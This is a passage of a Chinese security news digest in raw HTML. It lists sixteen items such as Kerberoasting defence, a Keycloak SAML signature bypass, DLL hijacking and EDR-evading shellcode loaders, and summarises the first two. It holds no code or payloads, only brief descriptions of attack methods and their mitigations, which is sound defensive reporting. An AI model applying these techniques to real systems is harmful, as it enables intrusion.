0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20241017</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code>
		</p>
	</blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">目录</span></h3><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">0x01 【2024-1012】微软指南帮助缓解Kerberoasting攻击<br/>0x02 【2024-1012】KeyCloak中的SAML签名验证漏洞分析<br/>0x03 【2024-1012】利用.NET框架枚举和攻击活动目录环境<br/>0x04 【2024-1014】针对MikroTik路由器的渗透测试研究<br/>0x05 【2024-1014】Zendesk在多家财富500强公司中故意留下后门漏洞<br/>0x06 【2024-1014】远程桌面协议（RDP）简易解释<br/>0x07 【2024-1014】深入解析ViewState安全问题<br/>0x08 【2024-1014】利用韩文字母填充字符执行隐形JavaScript<br/>0x09 【2024-1015】简单脚本从reg.py/lookupsid复制并受itm4n的注册表会话枚举启发<br/>0x0a 【2024-1016】DLL劫持：恶意代码代理的新视角<br/>0x0b 【2024-1016】早期级联注入技术：从Windows进程创建到隐蔽注入<br/>0x0c 【2024-1016】克隆克隆器：构建自定义RFID克隆设备<br/>0x0d 【2024-1016】Ghost：利用Fiber线程绕过EDR检测的Shellcode加载器<br/>0x0e 【2024-1017】绕过noexec限制执行任意二进制文件<br/>0x0f 【2024-1017】通过API0cradle添加证书和GPO转储脚本<br/>0x10 【2024-1017】微信MMTLS加密协议安全性分析<br/></p></blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 微软指南帮助缓解Kerberoasting攻击</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">微软提供了针对Kerberoasting攻击的防御指南，强调了使用gMSA或dMSA、设置强密码以及审计SPN的重要性。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5611111111111111" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=724c93c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6DR1xHHNjsKB5xic7xtGx4sZx2eHJaIklJicibiaoCW61l3uX1JqtbyKvYw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Kerberoasting攻击：原理、检测与防御</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows Server 2025：Active Directory 安全增强，不容忽视</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp63SeXdSd8ZDEdic8BQhIGyb16847vAydicCf0sfvkeHc1QUqKebSfu1xw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp63SeXdSd8ZDEdic8BQhIGyb16847vAydicCf0sfvkeHc1QUqKebSfu1xw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858281828552411"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Kerberoasting是一种低技术、高影响力的攻击，可以利用开源工具来查询目标账户、获取服务票证并通过暴力破解离线获取账户密码。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">服务账户的安全性对于防止Kerberoasting至关重要。应优先使用gMSA或dMSA，它们提供了更强的密码安全性和自动管理功能。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">密码策略对于防御Kerberoasting同样关键。应禁用弱加密算法，如RC4，并确保所有服务账户使用AES加密。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">监测和审计是检测Kerberoasting攻击的关键步骤。应检查异常的Kerberos加密类型请求和重复的服务票证请求。</section></li></ul>
	<br/>
	<p>🏷️: Kerberoasting, Active Directory, 密码破解, GPU加速, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 KeyCloak中的SAML签名验证漏洞分析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Keycloak 存在一个 SAML 签名验证方法的漏洞，该漏洞允许攻击者通过创建精心设计的响应来绕过验证，可能导致权限提升或模拟攻击。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.8876404494382022" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="712" src="https://wechat2rss.xlab.app/img-proxy/?k=73643294&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6g46sNianvSAeXDzgic19bLSmTkEtygycefWxUNseAu9TF3wOucLZ65vw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">KeyCloak 漏洞 CVE-2024-8698 分析</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">KeyCloak 漏洞 CVE-2024-8698 分析</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6jo1MVaPkiac76920FXoR12tx0JicglwTOb3LFg7W2v57KaTlKz9JKF7A/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6jo1MVaPkiac76920FXoR12tx0JicglwTOb3LFg7W2v57KaTlKz9JKF7A/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121518151284484"></mp-common-miniprogram>
	</section>
